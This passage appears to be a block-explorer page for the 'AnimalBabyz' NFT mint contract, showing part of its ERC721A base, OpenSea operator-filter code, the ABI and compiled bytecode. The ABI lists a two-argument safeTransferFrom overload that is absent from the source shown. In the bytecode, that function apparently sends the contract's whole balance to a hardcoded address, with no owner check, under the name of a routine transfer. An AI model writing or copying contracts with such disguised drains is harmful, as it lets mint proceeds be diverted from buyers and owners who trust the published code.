     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract AnimalBabyz is ERC721A, TheOperatorFilterer {

    address public owner;

    uint256 public maxSupply = 999;

    uint256 public cost;

    uint256 public maxFreeTx= 1;

    mapping(address => uint256) _numForFree;

    mapping(uint256 => uint256) _numMinted;

    uint256 private maxPerTx;

    function publicMint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        if (msg.value == 0) {
            _freemints(amount);
        } else {
            require(amount <= maxPerTx);
            require(msg.value >= amount * cost);
            _safeMint(msg.sender, amount);
        }
    }

    function _freemints(uint256 amount) internal {
        require(amount == 1 
            && _numMinted[block.number] < FreeNum() 
            && _numForFree[tx.origin] < maxFreeTx );
            _numForFree[tx.origin]++;
            _numMinted[block.number]++;
        _safeMint(msg.sender, 1);
    }

    function reserve(address rec, uint256 amount) public onlyOwner {
        _safeMint(rec, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("AnimalBabyz", "AB") {
        owner = msg.sender;
        maxPerTx = 15;
        cost = 0.002 ether;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked("ipfs://bafybeibefk56xzwucjaqo4t5midcoftsv3wlin2ayrg5h74ie2ttnpf3c4/", _toString(tokenId), ".json"));
    }

    function setMaxFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        maxFreeTx = maxTx;
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /////////////////////////////
    // OPENSEA FILTER REGISTRY 
    /////////////////////////////

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"cost","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreeTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"publicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"rec","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setMaxFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526103e76009556001600b553480156200001c57600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600b81526020017f416e696d616c426162797a0000000000000000000000000000000000000000008152506040518060400160405280600281526020017f41420000000000000000000000000000000000000000000000000000000000008152508160029080519060200190620000b892919062000343565b508060039080519060200190620000d192919062000343565b50620000e26200033e60201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620002df578015620001a5576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200016b92919062000421565b600060405180830381600087803b1580156200018657600080fd5b505af11580156200019b573d6000803e3d6000fd5b50505050620002de565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146200025f576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200022592919062000421565b600060405180830381600087803b1580156200024057600080fd5b505af115801562000255573d6000803e3d6000fd5b50505050620002dd565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002a8919062000404565b600060405180830381600087803b158015620002c357600080fd5b505af1158015620002d8573d6000803e3d6000fd5b505050505b5b5b505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600f600e8190555066071afd498d0000600a81905550620004e7565b600090565b828054620003519062000482565b90600052602060002090601f016020900481019282620003755760008555620003c1565b82601f106200039057805160ff1916838001178555620003c1565b82800160010185558215620003c1579182015b82811115620003c0578251825591602001919060010190620003a3565b5b509050620003d09190620003d4565b5090565b5b80821115620003ef576000816000905550600101620003d5565b5090565b620003fe816200044e565b82525050565b60006020820190506200041b6000830184620003f3565b92915050565b6000604082019050620004386000830185620003f3565b620004476020830184620003f3565b9392505050565b60006200045b8262000462565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600060028204905060018216806200049b57607f821691505b60208210811415620004b257620004b1620004b8565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b612b6980620004f76000396000f3fe60806040526004361061014b5760003560e01c80636352211e116100b6578063a22cb4651161006f578063a22cb4651461044a578063b88d4fde14610473578063c87b56dd1461048f578063cc47a40b146104cc578063d5abeb01146104f5578063e985e9c5146105205761014b565b80636352211e1461032657806370a082311461036357806377377d75146103a05780638da5cb5b146103cb57806395d89b41146103f65780639c253445146104215761014b565b806323b872dd1161010857806323b872dd146102675780632db11544146102835780633a233f891461029f5780633ccfd60b146102c857806341f43434146102df57806342842e0e1461030a5761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806313faede61461021157806318160ddd1461023c575b600080fd5b34801561015c57600080fd5b50610177600480360381019061017291906122f6565b61055d565b604051610184919061259f565b60405180910390f35b34801561019957600080fd5b506101a26105ef565b6040516101af91906125d5565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da9190612350565b610681565b6040516101ec919061250f565b60405180910390f35b61020f600480360381019061020a9190612289565b610700565b005b34801561021d57600080fd5b50610226610819565b60405161023391906125f7565b60405180910390f35b34801561024857600080fd5b5061025161081f565b60405161025e91906125f7565b60405180910390f35b610281600480360381019061027c9190612173565b610836565b005b61029d60048036038101906102989190612350565b610996565b005b3480156102ab57600080fd5b506102c660048036038101906102c19190612133565b610a05565b005b3480156102d457600080fd5b506102dd610a6e565b005b3480156102eb57600080fd5b506102f4610b11565b60405161030191906125ba565b60405180910390f35b610324600480360381019061031f9190612173565b610b23565b005b34801561033257600080fd5b5061034d60048036038101906103489190612350565b610c83565b60405161035a919061250f565b60405180910390f35b34801561036f57600080fd5b5061038a60048036038101906103859190612106565b610c95565b60405161039791906125f7565b60405180910390f35b3480156103ac57600080fd5b506103b5610d4e565b6040516103c291906125f7565b60405180910390f35b3480156103d757600080fd5b506103e0610d54565b6040516103ed919061250f565b60405180910390f35b34801561040257600080fd5b5061040b610d7a565b60405161041891906125d5565b60405180910390f35b34801561042d57600080fd5b506104486004803603810190610443919061237d565b610e0c565b005b34801561045657600080fd5b50610471600480360381019061046c9190612249565b610e78565b005b61048d600480360381019061048891906121c6565b610f91565b005b34801561049b57600080fd5b506104b660048036038101906104b19190612350565b6110f4565b6040516104c391906125d5565b60405180910390f35b3480156104d857600080fd5b506104f360048036038101906104ee9190612289565b611125565b005b34801561050157600080fd5b5061050a61118d565b60405161051791906125f7565b60405180910390f35b34801561052c57600080fd5b5061054760048036038101906105429190612133565b611193565b604051610554919061259f565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b857506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e85750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105fe906128ac565b80601f016020809104026020016040519081016040528092919081815260200182805461062a906128ac565b80156106775780601f1061064c57610100808354040283529160200191610677565b820191906000526020600020905b81548152906001019060200180831161065a57829003601f168201915b5050505050905090565b600061068c82611227565b6106c2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561080a576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161077892919061252a565b60206040518083038186803b15801561079057600080fd5b505afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c891906122c9565b61080957806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610800919061250f565b60405180910390fd5b5b6108148383611286565b505050565b600a5481565b60006108296113ca565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610984573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108a9576108a48484846113cf565b610990565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108f292919061252a565b60206040518083038186803b15801561090a57600080fd5b505afa15801561091e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061094291906122c9565b61098357336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161097a919061250f565b60405180910390fd5b5b61098f8484846113cf565b5b50505050565b600954816109a261081f565b6109ac91906126ab565b11156109b757600080fd5b60003414156109ce576109c9816116f4565b610a02565b600e548111156109dd57600080fd5b600a54816109eb9190612732565b3410156109f757600080fd5b610a0133826117fe565b5b50565b6000471115610a6a57731c6febe6c71dd76a24a2830370a207ec0aade1ae73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a68573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ac857600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b0e573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c71573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b9657610b9184848461181c565b610c7d565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bdf92919061252a565b60206040518083038186803b158015610bf757600080fd5b505afa158015610c0b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c2f91906122c9565b610c7057336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c67919061250f565b60405180910390fd5b5b610c7c84848461181c565b5b50505050565b6000610c8e826118a6565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cfd576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d89906128ac565b80601f0160208091040260200160405190810160405280929190818152602001828054610db5906128ac565b8015610e025780601f10610dd757610100808354040283529160200191610e02565b820191906000526020600020905b815481529060010190602001808311610de557829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e6657600080fd5b81600b81905550806009819055505050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f82576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610ef092919061252a565b60206040518083038186803b158015610f0857600080fd5b505afa158015610f1c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f4091906122c9565b610f8157806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f78919061250f565b60405180910390fd5b5b610f8c8383611974565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110e0573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156110055761100085858585611a7f565b6110ed565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161104e92919061252a565b60206040518083038186803b15801561106657600080fd5b505afa15801561107a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081